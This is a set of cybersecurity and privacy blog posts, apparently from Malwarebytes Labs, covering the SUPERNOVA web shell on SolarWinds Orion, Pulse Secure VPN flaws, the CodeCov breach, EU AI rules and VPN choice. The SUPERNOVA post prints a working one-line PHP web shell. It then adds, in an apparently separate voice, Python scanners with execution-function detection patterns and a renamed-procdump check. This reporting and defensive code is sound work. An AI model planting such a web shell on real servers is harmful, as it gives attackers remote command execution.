
Breaking free from the VirusTotal silo: Lock and Code S02E07

This week on Lock and Code, we speak to Malwarebytes Chief Information Security Officer John Donovan about the flaws in using VirusTotal as the one source of truth when evaluating whether or not a cybersecurity tool actually works. It’s a practice that is surprisingly common.

Weeks ago, Malwarebytes Labs released the SMB Cybersecurity Trust & Confidence Report, which revealed that the majority of small- to medium-sized businesses that we surveyed were taking proactive measures to test whether their endpoint protection was catching all the right—or wrong—stuff. We found that of those who did evaluate their endpoint protection tools, a hefty 58 percent did so strictly by using VirusTotal.

Now, VirusTotal is a massive online resource that countless cybersecurity researchers likely rely on every day. But it shouldn’t be the only tool that security teams rely on, because VirusTotal has some gaps. In fact, all the evaluation methods that respondents told us about in our survey are far from perfect, and they might lead to uninformed conclusions.

If endpoint detection tools are supposed to stop an attack before it happens, what good is evaluating it with an incomplete tool? It puts too much at risk. And that isn’t even mentioning the potential privacy threats involved.

“If you get a file that says ‘This looks like there’s a virus in it,’ be careful with what you’re uploading,” Donovan said. “If you take something that is a confidential memo that flagged your antivirus, you may want to figure out how to look at that somewhere differently rather than putting that up in VirusTotal.”

Tune in to learn about the smartest ways to test and implement endpoint protection into your small- to medium-sized business, and how to finally break free from the VirusTotal silo, on the latest episode of Lock and Code, with host David Ruiz.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Breaking free from the VirusTotal silo: Lock and Code S02E07 appeared first on Malwarebytes Labs.

Artificial Intelligence ban slammed for failing to address “vast abuse potential”

A written proposal to ban several uses of artificial intelligence (AI) and to place new oversight on other “high-risk” AI applications—published by the European Commission this week—met fierce opposition from several digital rights advocates in Europe.

Portrayed as a missed opportunity by privacy experts, the EU Commission’s proposal bans four broad applications of AI, but it includes several loopholes that could lead to abuse, and it fails to include a mechanism to add other AI applications to the ban list. It deems certain types of AI applications as “high-risk”—meaning their developers will need to abide by certain restrictions—but some of those same applications were specifically called out by many digital rights groups earlier this year as “incompatible with a democratic society.” It creates new government authorities, but the responsibilities of those authorities may overlap with separate authorities devoted to overall data protection.

Most upsetting to digital rights experts, it appears, is that the 107-page document (not including the necessary annexes) offers only glancing restrictions on biometric surveillance, like facial recognition software.

“The EU’s proposal falls far short of what is needed to mitigate the vast abuse potential of technologies like facial recognition systems,” said Rasha Abdul Rahim, Director of Amnesty Tech for Amnesty International. “Under the proposed ban, police will still be able to use non-live facial recognition software with CCTV cameras to track our every move, scraping images from social media accounts without people’s consent.”

AI bans

Released on April 21, the AI ban proposal is the product of years of work, dating back to 2018, when the European Commission and the European Union’s Member States agreed to draft AI policies and regulations. According to the European Commission, the plan is meant to not just place restrictions on certain AI uses, but to also allow for innovation and competition in AI development.

“The global leadership of Europe in adopting the latest technologies, seizing the benefits and promoting the development of human-centric, sustainable, secure, inclusive and trustworthy artificial intelligence (AI) depends on the ability of the European Union (EU) to accelerate, act and align AI policy priorities and investments,” the European Commission wrote in its Coordinated Plan on Artificial Intelligence.

The proposal includes a few core segments.

The proposal would ban, with some exceptions, four broad uses of AI. Two of those banned uses include the use of AI to distort a person’s behavior in a way that could cause harm to that person or another person; one of those two areas focuses on the use of AI to exploit a person or group’s “age, physical or mental disability.”

The proposal’s third ban targets the use of AI to create so-called social credit scores that could result in unjust treatment, a concern that lies somewhere between the haphazard systems implemented in some regions of China and the dystopic anthology series Black Mirror.

According to the proposal, the use of AI to evaluate or classify the “trustworthiness” of a person would not be allowed if those evaluations led to detrimental or unfavorable treatment in “social contexts which are unrelated to the contexts in which the data was originally generated or collected,” or treatment that is “unjustified or disproportionate to their social behavior or its gravity.”

The proposal’s final AI ban would be against “’real-time’ remote biometric identification systems in publicly accessible spaces for the purpose of law enforcement,” which means police could not use tools like facial recognition in real-time at public events, with some exceptions.

Those exceptions include the “targeted search” for “specific” potential victims of crime, including missing children, and the prevention of “specific, substantial, and imminent threat to the life or physical safety of natural persons, or of a terrorist attack.” Law enforcement could also use real-time facial recognition tools to detect, locate, identify, or prosecute a “perpetrator or suspect” of a crime of a certain severity.

According to Matthew Mahmoudi, a researcher and adviser for Amnesty Tech, these exceptions are too broad, as they could still allow for many abuses against certain communities. For instance, the exception that would allow for real-time facial recognition to be used “on people suspected of illegally entering or living in an EU member state… will undoubtedly be weaponised against migrants and refugees,” Mahmoudi said.

Aside from the proposal’s exceptions, it is the bans themselves that appear quite limited when compared to what is happening in the real world today.

As an example, the proposal does not ban post-fact facial recognition by law enforcement, in which officers could collect video imagery after a public event and run facial recognition software on that video from the comfort of their stations. Though the EU Commission’s proposal of course applies to Europe, this type of practice is already rampant within the United States, where police departments have lapped up the offerings of Clearview AI, the facial recognition company with an origin story that includes coordination with far-right extremists.

The problem is severe. As uncovered in a Buzzfeed investigation this year:

“According to reporting and data reviewed by BuzzFeed News, more than 7,000 individuals from nearly 2,000 public agencies nationwide have used Clearview AI to search through millions of Americans’ faces, looking for people, including Black Lives Matter protesters, Capitol insurrectionists, petty criminals, and their own friends and family members.”

Buzzfeed found similar police activity in Australia last year, and on the very same day that the EU Commission released its proposal, Malwarebytes Labs covered a story about the FBI using facial recognition to identify a rioter at the US Capitol on January 6.

This type of activity is thriving across the world. Digital rights experts believe now is the best chance the world has to stamp it out.

But what isn’t banned by the proposal isn’t necessarily unrestricted. In fact, the proposal simply creates new restrictions based on other types of activities it deems “high-risk.”

High-risk AI and oversight

The next segment of the proposal places restrictions on “high-risk” AI applications. These uses of AI would not be banned outright but would instead be subject to certain oversight and compliance, much of which would be performed by the AI’s developers.

According to the proposal, “high-risk” AI would fall into the following eight, broad categories:

  • Biometric identification and categorization of natural persons
  • Management and operation of critical infrastructure
  • Education and vocational training
  • Employment, workers management, and access to self-employment
  • Access to and enjoyment of essential private services and public services and benefits
  • Law enforcement
  • Migration, asylum, and border control management
  • Administration of justice and democratic processes

The proposal clarifies which types of AI applications would be considered high-risk in each of the given categories. For instance, not every single type of AI used in education and vocational training would be considered high-risk, but those that do qualify would be systems “intended to be used for the purpose of determining access or assigning natural persons to educational and vocational training institutions.” Similarly, AI systems used for employment recruiting—particularly those used to advertise open positions, screen applications, and evaluate candidates—would be classified as high-risk under the broader category of AI for employment, workers management, and access to self-employment.

Here, again, the proposal angered privacy experts.

In January of this year, 61 civil rights groups sent an open letter to the European Commission, asking that certain applications of AI be considered “red lines” that should not be crossed. The groups, which included Access Now, Electronic Privacy Information Center, and Privacy International, wrote to “call attention to specific (but non-exhaustive) examples of uses that are incompatible with a democratic society and must be prohibited or legally restricted in the AI legislation.”

Of the five areas called out as too dangerous to permit, at least three are considered “high-risk” by the European Commission’s proposal, including the use of AI for migration management, for criminal justice, and for predictive policing.

The problem, according to the group Access Now, is that the proposal’s current restrictions for high-risk AI would do little to actually protect people who are subject to those high-risk systems.

Per the proposal, developers of these high-risk AI systems would need to comply with several self-imposed rules. They would need to establish and implement a “risk management system” that identifies foreseeable risks. They would need to draft up and keep up to date their “technical documentation.” They would need to design their systems to implement automatic record-keeping, ensure transparency, and allow for human oversight.

According to the European Digital Rights (EDRi) association, these rules put too much burden on the developers of the tools themselves.

“The majority of requirements in the proposal naively rely on AI developers to implement technical solutions to complex social issues, which are likely self-assessed by the companies themselves,” the group wrote. “In this way, the proposal enables a profitable market of unjust AI to be used for surveillance and discrimination, and pins the blame on the technology developers, instead of the institutions or companies putting the systems to use.”

Finally, the proposal would place some oversight and regulation duties into the hands of the government, including the creation of an “EU database” that contains information about high-risk AI systems, the creation of a European Artificial Intelligence Board, and the designation of a “national supervisory authority” for each EU Member State.

This, too, has brought pushback, as the regulatory bodies could overlap in responsibility with the European Data Protection Board and the Data Protection Authorities already designated by each EU Member State, per the changes implemented by the General Data Protection Regulation.

What next?

Though AI technology races ahead, the EU Commission’s proposal will likely take years to implement, as it still needs to be approved by the Council of the European Union and the European Parliament to become law.

Throughout that process, there are sure to be many changes, updates, and refinements. Hopefully, they’re for the better.


SUPERNOVA malware discovered on SolarWinds Orion server

The Cybersecurity and Infrastructure Security Agency (CISA) has reported finding the SUPERNOVA web shell collecting credentials on a SolarWinds Orion server. These observations were made during an incident response to an Advanced Persistent Threat (APT) actor’s year-long compromise of an enterprise network. In its analysis, the agency warns that the threat actor behind the compromise “targeted multiple entities in the same period”.

NOT part of the SolarWinds attack

The SUPERNOVA web shell is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds Orion monitoring product. SUPERNOVA is therefore placed through lateral movement inside a network and is not considered part of the SolarWinds supply chain attack. The threat actors are believed to be different from the ones behind the infamous supply chain attack.

Pulse Secure VPN

CISA found that the attacker(s) had access to the enterprise’s network for nearly a year, between March 2020 and February 2021. According to its investigation, the threat actor connected to the entity’s network via a Pulse Secure Virtual Private Network (VPN) appliance. CISA reports that it “does not know how the threat actor initially obtained these credentials” but, by coincidence, just two days ago we detailed multiple Pulse Secure vulnerabilities that are being actively exploited in the wild and that could have been leveraged in such an attack.

The attacker(s) authenticated to the VPN appliance through several user accounts that did not have multi-factor authentication (MFA) enabled and were able to masquerade as legitimate teleworking employees.

From there they moved laterally to the entity’s SolarWinds Orion server to establish a backdoor that would allow them to persist, so they could connect even if their initial point of entry was closed.

Web shells

Web shells are usually small scripts that act as a backdoor or a first point of entry for an attacker. A minimal web shell can be as simple as this:

<?=`$_GET[1]`?>

A shell like this will sit on a compromised server and simply execute whatever command an attacker sends it via a web URL. The SUPERNOVA web shell is more sophisticated, and written in .NET rather than PHP, but it is essentially no different.

It is initially installed by a PowerShell script and hides in a malicious version of the SolarWinds Orion Web Application module. It enables remote injection of C# source code into a web portal provided by the SolarWinds software suite. The injected code is compiled and directly executed in memory.
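As an added example (not from the article or from CISA’s analysis), the following Python scanner flags source files in which a request-controlled input reaches a command-execution or in-memory-compilation construct, the pattern behind both the PHP one-liner above and the C# injection the article describes for SUPERNOVA. The sample files, their paths and the .NET rules (`CompileAssemblyFromSource`, `Process.Start`) are my assumptions, not anything taken from SUPERNOVA itself.

```python
import re
from dataclasses import dataclass

# Request-controlled inputs: PHP superglobals and ASP.NET request collections.
INPUT_SOURCE = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|\bRequest\.(?:Form|QueryString|Params)\b"
    r"|\bRequest\[\s*[\"']"
)

# Constructs that execute or compile whatever they are handed.
EXEC_SINKS = {
    "php-backtick": re.compile(r"`[^`\n]*`"),  # PHP shell-execution operator
    "php-exec-function": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("
    ),
    "php-eval": re.compile(r"\beval\s*\("),
    # In-memory C# compilation (System.CodeDom); the article says SUPERNOVA
    # compiles injected C# source and runs it in memory. Rule added by me.
    "dotnet-compile": re.compile(r"\bCompileAssemblyFromSource\s*\("),
    "dotnet-process": re.compile(r"\bProcess\.Start\s*\("),
}

WINDOW = 160  # characters around a sink within which a source counts as feeding it


@dataclass(frozen=True)
class Finding:
    path: str
    sink: str
    line: int
    snippet: str


def scan_source(path: str, text: str) -> list:
    """Return a Finding for each sink that has a request-controlled input nearby."""
    findings = []
    for name, sink in EXEC_SINKS.items():
        for m in sink.finditer(text):
            lo = max(0, m.start() - WINDOW)
            hi = min(len(text), m.end() + WINDOW)
            if INPUT_SOURCE.search(text, lo, hi):
                line = text.count("\n", 0, m.start()) + 1
                findings.append(Finding(path, name, line, m.group(0)[:60]))
    return findings


def scan_files(files: dict) -> dict:
    """Map each suspicious path to the sorted list of sink names seen in it."""
    result = {}
    for path, text in files.items():
        hits = scan_source(path, text)
        if hits:
            result[path] = sorted({h.sink for h in hits})
    return result


# Constructed sample files: one is the one-liner quoted in the article, two are
# benign look-alikes, and one is a made-up .NET handler (not SUPERNOVA's code)
# that compiles whatever arrives in a POST field.
SAMPLE_FILES = {
    "upload/cmd.php": "<?=`$_GET[1]`?>",
    "app/hello.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
    "app/cron.php": "<?php $out = shell_exec('uptime'); echo $out; ?>",
    "webapp/Handler.aspx.cs": (
        "// constructed handler, not SUPERNOVA's code\n"
        "var src = Request.Form[\"src\"];\n"
        "var result = provider.CompileAssemblyFromSource(opts, src);\n"
    ),
}

if __name__ == "__main__":
    for path, sinks in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(sinks)}")
```

The benign files are left alone because a request input alone, or a fixed command alone, is not enough; only the combination within a short window is reported.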

Harvesting credentials

The goal of the operation looks to have been to gather even more credentials. CISA reports that the threat actor was able to dump credentials from the SolarWinds appliance via two methods:

  • By extracting cached credentials used by the SolarWinds appliance server and network monitoring.
  • By dumping Local Security Authority Subsystem Service (LSASS) memory.

The cached credentials are normally protected by encryption unless they are marked as exportable. So, either the threat actor was able to change or bypass that property, or the victim mistakenly marked the private key certificate as exportable.

The attacker put a renamed copy of procdump.exe on the SolarWinds Orion server to dump the LSASS memory. The credentials were then dumped into a text file and exfiltrated by an HTTP request.

CVE-2020-10148

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). CISA believes that a vulnerability listed as CVE-2020-10148 was used to bypass the authentication to the SolarWinds appliance.

The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands, which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.

Bypassing the authentication would have enabled them to run commands with the privileges under which the SolarWinds appliance was running, which in this case was SYSTEM.

Recommendations

Based on findings from the ongoing investigation, CISA recommends that all organizations implement the following practices to strengthen the security posture of their systems:

  • Check for common executables executing with the hash of another process.
  • Implement MFA, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Implement Local Administrator Password Solution (LAPS).
  • Implement the principle of least privilege on data access.
  • Secure Remote Desktop Protocol (RDP) and other remote access solutions using MFA and “jump boxes” for access.
  • Deploy and maintain endpoint defense tools on all endpoints.
  • Ensure all software is up to date.
  • Maintain up-to-date antivirus signatures and engines.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Enable a personal firewall on organization workstations that is configured to deny unsolicited connection requests.
  • Disable unnecessary services on organization workstations and servers.
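As an added example of CISA’s first recommendation above, and of spotting the renamed copy of procdump.exe described earlier, this Python script (mine, not CISA’s or Malwarebytes’ tooling) hashes executables and flags any whose hash matches a catalogued tool but whose file name differs. The sample byte strings, the hashes derived from them and the paths are constructed placeholders, not real procdump hashes.

```python
import hashlib
import os
import re

# Constructed stand-ins for real binaries; the hashes derived from them are
# placeholders, not the hashes of procdump.exe or any real file.
SAMPLE_PROCDUMP = b"MZ\x90\x00 constructed stand-in for procdump.exe"
SAMPLE_NOTEPAD = b"MZ\x90\x00 constructed stand-in for notepad.exe"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Hash -> (expected file name, why it matters). In practice populate this from
# trusted copies or vendor-published hashes; this catalogue is a constructed example.
KNOWN_TOOLS = {
    sha256_hex(SAMPLE_PROCDUMP): ("procdump.exe", "can dump LSASS memory"),
    sha256_hex(SAMPLE_NOTEPAD): ("notepad.exe", "benign editor"),
}


def base_name(path: str) -> str:
    """File name component of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1]


def check_file(path: str, data: bytes, catalog: dict = KNOWN_TOOLS):
    """Return a finding dict if the content is a known tool saved under another name."""
    digest = sha256_hex(data)
    entry = catalog.get(digest)
    if entry is None:
        return None  # not a catalogued tool; nothing to compare the name against
    expected, note = entry
    if base_name(path).lower() == expected.lower():
        return None  # known tool under its own name; not this rule's concern
    return {"path": path, "matches": expected, "note": note, "sha256": digest}


def scan_bytes(files: dict) -> list:
    """Check an in-memory {path: bytes} map; convenient for tests and samples."""
    findings = []
    for path, data in files.items():
        finding = check_file(path, data)
        if finding:
            findings.append(finding)
    return findings


def scan_directory(root: str, catalog: dict = KNOWN_TOOLS) -> list:
    """Walk a directory tree on a real host and apply the same check to every file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable or vanished file; skip rather than abort the scan
            finding = check_file(full, data, catalog)
            if finding:
                findings.append(finding)
    return findings


# Constructed observations modelled on the incident: procdump under its own name,
# a renamed copy dropped in a temp folder, and a file that is not catalogued.
OBSERVED = {
    r"C:\Tools\procdump.exe": SAMPLE_PROCDUMP,
    r"C:\Windows\Temp\upd.exe": SAMPLE_PROCDUMP,
    r"C:\Windows\notepad.exe": SAMPLE_NOTEPAD,
    r"C:\Temp\report.exe": b"MZ\x90\x00 something not in the catalogue",
}

if __name__ == "__main__":
    for f in scan_bytes(OBSERVED):
        print(f"{f['path']} has the hash of {f['matches']} ({f['note']})")
```

A copy of procdump.exe under its own name is deliberately not reported by this rule, but on a server that has no reason to run it, that is still worth a look.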

It also urges users of SolarWinds Orion versions 2019.4 through 2020.2.1 HF1 to review Emergency Directive ED 21-01 and associated guidance for recommendations on operating the SolarWinds Orion platform. US federal agencies are required to comply with these directives.

Stay safe, everyone!


How to choose the best VPN for you

If you’ve been shopping for a VPN service in 2021, you’ve probably noticed how many providers are available. Using a personal VPN has grown in popularity in recent years, and for good reason. You may no longer be asking, “Should I use one,” but rather, “Which one should I choose?”

The answer might be different for different people. There are many features and providers to consider. Here, we guide you through some of the decision factors so you can select the best VPN for your needs.

Is a free VPN the best choice?

One of the first questions VPN shoppers might ask is whether to use a free VPN service or pay for one. If you’re familiar with what a VPN is, you probably know that there are costs associated with being a provider. A VPN is like a middleman for your Internet traffic, and just like you probably pay an Internet Service Provider for your home Internet, a VPN provider somehow has to cover the costs of their service.

You might compare free vs paid VPNs to free vs paid Internet access. For home Internet access, an Internet Service Provider maintains the infrastructure to deliver Internet to homes, and charges customers for it. If you go to a café and use their free WiFi, the café pays for the WiFi and might build that cost into how much they charge you for a cup of coffee. So, how would a free VPN provider build their costs into a free service?

A common way free VPN services cover their costs is through advertising. That might be showing you ads when you use the service, or by taking your Internet activity data (as well as their other customers’ data) and selling that to advertisers as marketing data. Given that one of the main reasons to use a VPN is to increase your online privacy, it seems that using a free VPN that covers its costs by using your Internet activity for advertising might not accomplish that goal.

If you decide you want to use a paid VPN service for your online privacy but you’re not ready to commit to a long-term subscription right away, many providers offer a free trial before you have to make that commitment.

Choosing a VPN for gaming, streaming, or torrenting

One of the key decision factors in choosing a VPN is what you plan to use it for. In your research, you’ll likely explore reviews to help narrow down your selection, and one of the best ways to make your choice is to take advantage of free trials, so you can take the VPN for a test drive, so to speak. 

The best VPN for you might not be the best one for someone else. Online privacy is the main concern for most VPN users, but if you intend to use one while gaming, watching streaming services based in other countries, or for torrenting, you will have other considerations too and might choose a different provider in each case.

Best VPN for gaming

Many avid gamers have not wanted to use a VPN while gaming due to increased lag caused by encrypting traffic and routing it through a VPN server. However, many VPNs have gotten faster and more efficient, and “gaming VPN” is less of an oxymoron than it used to be. In addition to the online privacy benefits, gamers may also be keen to hide their IP addresses due to threats like doxing and swatting.

Alternatively, some users don’t want to use a VPN for gaming, but do want to use a VPN for everything else other than gaming. In that case, they will want to pay attention to how easily and transparently they can do this. Do they have to do one thing at a time and remember to turn the VPN on and off as they need it, or can they keep their VPN on all the time while allowing games to bypass it?

If you’re a gamer searching for the best VPN specifically for gaming, take advantage of free trials, and test out your selections while gaming to see how they impact speed and performance. 

Best VPN for streaming

Most VPN services enable you to select a server in the country of your choice, and this can enable you to watch some streaming services as if you were located in that country. However, some streaming services have cracked down on this practice, and so not every VPN will enable you to watch the content you want. Testing out a VPN with the streaming services you want to watch is a good way to determine what works now, but keep in mind that your access may change as streaming services adapt. Before using a VPN to access a streaming service, be sure to check that doing so does not violate their terms and conditions.

Best VPN for torrenting

Torrenting is a form of peer-to-peer (P2P) file sharing. Torrent downloads are quick because they are drawn from multiple nearby peers instead of from a single faraway location. To get access to the network users must become peers and allow a small portion of their computer’s resources to be used for hosting torrent data. While sharing files with other users isn’t illegal in and of itself, torrenting is often associated with pirating copyrighted material. However, there is perfectly legal content that people torrent, such as classic movies, TED Talks, and content in indie or niche genres that might not be readily available on large streaming services.

For torrenting, connection speed is often the most important factor in choosing a VPN, so you can start watching content quickly. Unlike gaming, where download performance matters most, torrent users will also care about upload performance. This is another case in which taking advantage of free trials to test VPN speeds while torrenting can help you pick the best VPN for this purpose.

VPN features

Once you’ve thought about how you plan to use a VPN, the final step to select the best one for your needs is to compare features. This includes:

  • Ease of use: Is the interface easy to navigate and use?
  • Connection speed: You can test this if you do a free trial of the services you’re considering, and look at VPN speed comparison tests.
  • Server locations: In how many different countries are servers available?
  • Data limits: Does the service provide unlimited data, or is there a cap?
  • Simultaneous usage: How many devices can use your plan simultaneously?
  • Operating systems: Can you use the same VPN service on Windows, Mac, Android, and iOS?
  • VPN protocol: Do they use WireGuard, OpenVPN, or another protocol?
  • Encryption: Does the VPN use 256-bit AES encryption, the current best-in-class standard? 
  • Logging: Do they keep activity logs or have a no-log policy? What data gets logged?
  • Kill switch: Do they offer a kill switch, to close your browsers or apps if the VPN disconnects unexpectedly?
  • Split tunneling: Do you want to be able to do some online activities inside the encrypted VPN, and others (such as high-bandwidth activities) just on your regular Internet connection?
  • Support: Is support available 24/7? Is it available via chat, email, phone?

What’s the best VPN for your needs? Different people will have different answers. Considering the available features and reasons you want to use a VPN service will help you to answer that question.


Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild

Pulse Secure has alerted customers to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.

Cybersecurity sleuths Mandiant report that they are tracking “12 malware families associated with the exploitation of Pulse Secure VPN devices” operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that Pulse Secure says impacts a very limited number of customers.

The old vulnerabilities

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:

  • CVE-2019-11510: an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file read vulnerability. We wrote about the apparent reluctance to patch this vulnerability in 2019.
  • CVE-2020-8243: a vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to achieve arbitrary code execution.
  • CVE-2020-8260: a vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to achieve arbitrary code execution through uncontrolled gzip extraction.

The obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.

The new vulnerability

The new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10—the maximum—and a Critical rating. According to the Pulse advisory:

[The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.

There is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don’t wait for the patch.

Mitigation requires a workaround

According to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company’s Security Advisory 44784. Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.

Targets

The Pulse Connect Secure vulnerabilities, including CVE-2021-22893, have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat actors are linked to China. The identified threat actors were found to be harvesting account credentials, very likely in order to perform lateral movement within compromised organizations’ environments. Researchers have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.

Threat analysis

FireEye’s Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which it has dubbed SlowPulse. According to Mandiant, the malware and its variants are “applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so”. In its blog post, Mandiant discusses four variants; interested parties can also find technical details and detections there.

Networking devices

State-sponsored cyber-attacks are often more about espionage than about monetary gain, with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of the login credentials of those who have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credentials is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology, however, it makes sense in this case to look first at state-sponsored threat actors.


FBI face recognition trawl finds Capitol rioter via his girlfriend’s Instagram

Facial recognition tech is in the news again after the FBI discovered the identity of one of the Capitol rioters by using facial recognition software on his girlfriend’s Instagram posts. It may sound scary and invasive, but in truth, what’s happening isn’t particularly new. In this case, we have what’s fast becoming a fairly standard tale of tracking people down via online imagery. Sometimes there’s cause for concern even without the latest tech providing some sort of flashpoint.

What’s happened?

After the Capitol riots following the US election, those responsible were slowly arrested over a period of weeks of searching and identifying. The Verge story mentions that in this effort, law enforcement made use of “facial recognition tools” to track down people associated with the event. The tool apparently brought researchers to the Instagram feed of a suspect’s girlfriend. It was a short step from there to matching his clothes with images from the Capitol riot.

Everything unravelled for the suspect quickly. Facebook accounts revealed his name. This brought investigators (via his state driving licence records) to his identity, workplace, and home.

Recognising recognition

We’ve covered facial recognition on the blog many times. Most concerns tend to focus on the potential for abuse from repressive Governments and law enforcement overreach. It’s such a concern that tech giants regularly dip in, and then quickly dip out when public opinion turns.

I don’t think many people will complain if facial recognition is used to help identify the people at the Capitol riots. Organisations find new ways to secure their sites with facial recognition and biometrics on a daily basis. You may or may not object to your bank combining facial recognition with AI software. These are potentially useful applications of this technology. Even so, we need to know what we’re dealing with for this story.

When pop culture and cold hard reality collide

Facial recognition is very much one of those technologies made a cliche for all time by film and television. The camera zooms in from orbit, it picks up the target in seconds, the operator is able to tell where the suspect bought his suit by enhancing the fibers on his jacket and so on.

The reality here is, “some people used a program to play mix and match with publicly available photographs”. The end result is still impressive, but CSI: Cyber this is not.

Impressive, but not CSI: Cyber

How does this work, then? Well, the article mentions “open source facial recognition tools”. The affidavit doesn’t say which tool, because law enforcement doesn’t want to give perpetrators clues for avoiding the long arm of the law. You can see some of the more popular tools available here, if you’re interested in learning more or giving them a go.

Otherwise, there are many other ways to match images with the raft of materials floating around online. TinEye is a dedicated online tool for matching images, and Google / Bing / Yandex search all offer their own versions of this functionality. A little bit of sleuthing and familiarity with OSINT practices can go a long way.

A sliding scale of “that’s impressive”

One of the best examples of this happened just recently, with a lost hiker pinpointed via a photograph. To me, this is significantly more impressive than digging a fairly distinctive individual out from a never-ending pile of selfies and readily available data on popular image sharing websites. As a result, I’d say this one is interesting, but definitely nothing new. Crowdsourcing also has a history of going horribly wrong, and the infamous Reddit Boston Bombing debacle is as good a place to drop this warning as any.

We’ll definitely see more of these stories in the near future, but I wouldn’t necessarily start panicking about this branch of open sourcing just yet.

The post FBI face recognition trawl finds Capitol rioter via his girlfriend’s Instagram appeared first on Malwarebytes Labs.

CodeCov supply-chain compromise likened to SolarWinds attack

CodeCov, a company that creates software auditing tools for developers, was recently breached (the company says it was breached on April 1, and reported it on April 15). According to investigators, this incident, in turn, gave attackers access to an unknown number of CodeCov’s clients’ networks.

One cannot help but think that this knock-on breach effect is a supply-chain attack, similar to what happened to SolarWinds and their clients.

As you may recall, in the SolarWinds attack multiple companies reported being breached by state-sponsored adversaries, following an attack on the IT company SolarWinds that resulted in undetected modifications to its products. Those affected included FireEye, which resulted in the theft of their Red Team assessment tools; Microsoft; and departments in the US Treasury and Commerce.

Like SolarWinds, this seems like another attempt to add malicious code to products supplied to other organizations, so as to compromise those organizations, and potentially the software products they supply too.

CodeCov said that its Bash Uploader script, used by clients to find and upload code coverage reports to CodeCov, had been initially tampered with at the end of January this year. This wouldn’t have been found out if a client hadn’t raised concerns on April 1. According to the company, attackers were able to gain access to and alter the script by exploiting an error in CodeCov’s Docker image creation process.

A security update post by CodeCov states:

“Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure.”

Because the script is allowed to search through users’ code it potentially has access to any credentials stored with that code. This could have given the attackers access to systems inside CodeCov’s clients’ networks, and in turn, the code that those companies are developing and supplying to others. And because it is expected to upload data outside of the clients’ networks, the upload script also offered an easy exfiltration route for the stolen data.

According to Reuters, the CodeCov attackers rapidly copied and pasted credentials from compromised customers, via an automated script, and used an automated way of searching for other resources (it’s not clear if these are references to the bash upload script, which seems to fit that description, or some other tools). “The hackers put extra effort into using CodeCov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” Reuters also revealed in an interview with one of the investigators.

Reuters reports that IBM, Atlassian, and other clients of CodeCov have said that their code has not been altered, while not addressing the question of credentials. Hewlett Packard Enterprise, another CodeCov client, has yet to determine whether it or any of its clients have been affected by this breach, according to the news service.

CodeCov says the modified Bash Uploader could affect:

– Any credentials, tokens, or keys that our customers were passing through their [Continuous Integration] runner that would be accessible when the Bash Uploader script was executed.

– Any services, data stores, and application code that could be accessed with these credentials, tokens, or keys.

– The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

CodeCov has a list of recommended actions to take, which concerns “all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.” If you’re a CodeCov client, go here for more details. You will also find there a list of actions the company has taken in response to this breach.
